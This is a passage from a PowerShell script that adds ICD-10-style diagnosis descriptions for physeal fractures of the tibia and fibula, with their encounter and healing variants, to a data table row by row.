lower end of right tibia","Salter-Harris Type III physeal fracture of lower end of right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of right tibia","Salter-Harris Type III physeal fracture of lower end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of left tibia","Salter-Harris Type III physeal fracture of lower end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of left tibia","Salter-Harris Type III physeal fracture of lower end of left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of left tibia","Salter-Harris Type III physeal fracture of lower end of left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of left tibia","Salter-Harris Type III physeal fracture of lower end of left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of left tibia","Salter-Harris Type III physeal fracture of lower end of left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of left tibia","Salter-Harris Type III physeal fracture of lower end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of unspecified tibia","Salter-Harris Type III physeal fracture of lower end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of unspecified tibia","Salter-Harris Type III physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of unspecified tibia","Salter-Harris Type III physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of unspecified tibia","Salter-Harris Type III physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of unspecified tibia","Salter-Harris Type III physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of unspecified tibia","Salter-Harris Type III physeal fracture of lower end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of right tibia","Salter-Harris Type IV physeal fracture of lower end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of right tibia","Salter-Harris Type IV physeal fracture of lower end of right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of right tibia","Salter-Harris Type IV physeal fracture of lower end of right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of right tibia","Salter-Harris Type IV physeal fracture of lower end of right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of right tibia","Salter-Harris Type IV physeal fracture of lower end of right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of right tibia","Salter-Harris Type IV physeal fracture of lower end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of left tibia","Salter-Harris Type IV physeal fracture of lower end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of left tibia","Salter-Harris Type IV physeal fracture of lower end of left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of left tibia","Salter-Harris Type IV physeal fracture of lower end of left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of left tibia","Salter-Harris Type IV physeal fracture of lower end of left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of left tibia","Salter-Harris Type IV physeal fracture of lower end of left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of left tibia","Salter-Harris Type IV physeal fracture of lower end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of unspecified tibia","Salter-Harris Type IV physeal fracture of lower end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of unspecified tibia","Salter-Harris Type IV physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of unspecified tibia","Salter-Harris Type IV physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of unspecified tibia","Salter-Harris Type IV physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of unspecified tibia","Salter-Harris Type IV physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of lower end of unspecified tibia","Salter-Harris Type IV physeal fracture of lower end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right tibia","Other physeal fracture of lower end of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right tibia","Other physeal fracture of lower end of right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right tibia","Other physeal fracture of lower end of right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right tibia","Other physeal fracture of lower end of right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right tibia","Other physeal fracture of lower end of right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right tibia","Other physeal fracture of lower end of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left tibia","Other physeal fracture of lower end of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left tibia","Other physeal fracture of lower end of left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left tibia","Other physeal fracture of lower end of left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left tibia","Other physeal fracture of lower end of left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left tibia","Other physeal fracture of lower end of left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of left tibia","Other physeal fracture of lower end of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified tibia","Other physeal fracture of lower end of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified tibia","Other physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified tibia","Other physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified tibia","Other physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified tibia","Other physeal fracture of lower end of unspecified tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of unspecified tibia","Other physeal fracture of lower end of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right fibula","Unspecified physeal fracture of upper end of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right fibula","Unspecified physeal fracture of upper end of right fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right fibula","Unspecified physeal fracture of upper end of right fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right fibula","Unspecified physeal fracture of upper end of right fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right fibula","Unspecified physeal fracture of upper end of right fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of right fibula","Unspecified physeal fracture of upper end of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left fibula","Unspecified physeal fracture of upper end of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left fibula","Unspecified physeal fracture of upper end of left fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left fibula","Unspecified physeal fracture of upper end of left fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left fibula","Unspecified physeal fracture of upper end of left fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left fibula","Unspecified physeal fracture of upper end of left fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of left fibula","Unspecified physeal fracture of upper end of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified fibula","Unspecified physeal fracture of upper end of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified fibula","Unspecified physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified fibula","Unspecified physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified fibula","Unspecified physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified fibula","Unspecified physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of unspecified fibula","Unspecified physeal fracture of upper end of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right fibula","Salter-Harris Type I physeal fracture of upper end of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right fibula","Salter-Harris Type I physeal fracture of upper end of right fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right fibula","Salter-Harris Type I physeal fracture of upper end of right fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right fibula","Salter-Harris Type I physeal fracture of upper end of right fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right fibula","Salter-Harris Type I physeal fracture of upper end of right fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of right fibula","Salter-Harris Type I physeal fracture of upper end of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left fibula","Salter-Harris Type I physeal fracture of upper end of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left fibula","Salter-Harris Type I physeal fracture of upper end of left fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left fibula","Salter-Harris Type I physeal fracture of upper end of left fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left fibula","Salter-Harris Type I physeal fracture of upper end of left fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left fibula","Salter-Harris Type I physeal fracture of upper end of left fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of left fibula","Salter-Harris Type I physeal fracture of upper end of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified fibula","Salter-Harris Type I physeal fracture of upper end of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified fibula","Salter-Harris Type I physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified fibula","Salter-Harris Type I physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified fibula","Salter-Harris Type I physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified fibula","Salter-Harris Type I physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of unspecified fibula","Salter-Harris Type I physeal fracture of upper end of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of right fibula","Salter-Harris Type II physeal fracture of upper end of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of right fibula","Salter-Harris Type II physeal fracture of upper end of right fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of right fibula","Salter-Harris Type II physeal fracture of upper end of right fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of right fibula","Salter-Harris Type II physeal fracture of upper end of right fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of right fibula","Salter-Harris Type II physeal fracture of upper end of right fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of right fibula","Salter-Harris Type II physeal fracture of upper end of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of left fibula","Salter-Harris Type II physeal fracture of upper end of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of left fibula","Salter-Harris Type II physeal fracture of upper end of left fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of left fibula","Salter-Harris Type II physeal fracture of upper end of left fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of left fibula","Salter-Harris Type II physeal fracture of upper end of left fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of left fibula","Salter-Harris Type II physeal fracture of upper end of left fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of left fibula","Salter-Harris Type II physeal fracture of upper end of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of unspecified fibula","Salter-Harris Type II physeal fracture of upper end of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of unspecified fibula","Salter-Harris Type II physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of unspecified fibula","Salter-Harris Type II physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of unspecified fibula","Salter-Harris Type II physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of unspecified fibula","Salter-Harris Type II physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of unspecified fibula","Salter-Harris Type II physeal fracture of upper end of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right fibula","Other physeal fracture of upper end of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right fibula","Other physeal fracture of upper end of right fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right fibula","Other physeal fracture of upper end of right fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right fibula","Other physeal fracture of upper end of right fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right fibula","Other physeal fracture of upper end of right fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of right fibula","Other physeal fracture of upper end of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left fibula","Other physeal fracture of upper end of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left fibula","Other physeal fracture of upper end of left fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left fibula","Other physeal fracture of upper end of left fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left fibula","Other physeal fracture of upper end of left fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left fibula","Other physeal fracture of upper end of left fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of left fibula","Other physeal fracture of upper end of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified fibula","Other physeal fracture of upper end of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified fibula","Other physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified fibula","Other physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified fibula","Other physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified fibula","Other physeal fracture of upper end of unspecified fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of unspecified fibula","Other physeal fracture of upper end of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right fibula","Unspecified physeal fracture of lower end of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right fibula","Unspecified physeal fracture of lower end of right fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right fibula","Unspecified physeal fracture of lower end of right fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right fibula","Unspecified physeal fracture of lower end of right fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right fibula","Unspecified physeal fracture of lower end of right fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of right fibula","Unspecified physeal fracture of lower end of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left fibula","Unspecified physeal fracture of lower end of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left fibula","Unspecified physeal fracture of lower end of left fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left fibula","Unspecified physeal fracture of lower end of left fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left fibula","Unspecified physeal fracture of lower end of left fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left fibula","Unspecified physeal fracture of lower end of left fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of left fibula","Unspecified physeal fracture of lower end of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified fibula","Unspecified physeal fracture of lower end of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified fibula","Unspecified physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified fibula","Unspecified physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified fibula","Unspecified physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified fibula","Unspecified physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of unspecified fibula","Unspecified physeal fracture of lower end of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right fibula","Salter-Harris Type I physeal fracture of lower end of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right fibula","Salter-Harris Type I physeal fracture of lower end of right fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right fibula","Salter-Harris Type I physeal fracture of lower end of right fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right fibula","Salter-Harris Type I physeal fracture of lower end of right fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right fibula","Salter-Harris Type I physeal fracture of lower end of right fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of right fibula","Salter-Harris Type I physeal fracture of lower end of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left fibula","Salter-Harris Type I physeal fracture of lower end of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left fibula","Salter-Harris Type I physeal fracture of lower end of left fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left fibula","Salter-Harris Type I physeal fracture of lower end of left fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left fibula","Salter-Harris Type I physeal fracture of lower end of left fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left fibula","Salter-Harris Type I physeal fracture of lower end of left fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of left fibula","Salter-Harris Type I physeal fracture of lower end of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified fibula","Salter-Harris Type I physeal fracture of lower end of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified fibula","Salter-Harris Type I physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified fibula","Salter-Harris Type I physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified fibula","Salter-Harris Type I physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified fibula","Salter-Harris Type I physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of unspecified fibula","Salter-Harris Type I physeal fracture of lower end of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right fibula","Salter-Harris Type II physeal fracture of lower end of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right fibula","Salter-Harris Type II physeal fracture of lower end of right fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right fibula","Salter-Harris Type II physeal fracture of lower end of right fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right fibula","Salter-Harris Type II physeal fracture of lower end of right fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right fibula","Salter-Harris Type II physeal fracture of lower end of right fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of right fibula","Salter-Harris Type II physeal fracture of lower end of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left fibula","Salter-Harris Type II physeal fracture of lower end of left fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left fibula","Salter-Harris Type II physeal fracture of lower end of left fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left fibula","Salter-Harris Type II physeal fracture of lower end of left fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left fibula","Salter-Harris Type II physeal fracture of lower end of left fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left fibula","Salter-Harris Type II physeal fracture of lower end of left fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of left fibula","Salter-Harris Type II physeal fracture of lower end of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified fibula","Salter-Harris Type II physeal fracture of lower end of unspecified fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified fibula","Salter-Harris Type II physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified fibula","Salter-Harris Type II physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified fibula","Salter-Harris Type II physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified fibula","Salter-Harris Type II physeal fracture of lower end of unspecified fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of unspecified fibula","Salter-Harris Type II physeal fracture of lower end of unspecified fibula, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right fibula","Other physeal fracture of lower end of right fibula, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right fibula","Other physeal fracture of lower end of right fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right fibula","Other physeal fracture of lower end of right fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right fibula","Other physeal fracture of lower end of right fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right fibula","Other physeal fracture of lower end of right fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of lower end of right fibula","Other physeal fracture of lower end of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture 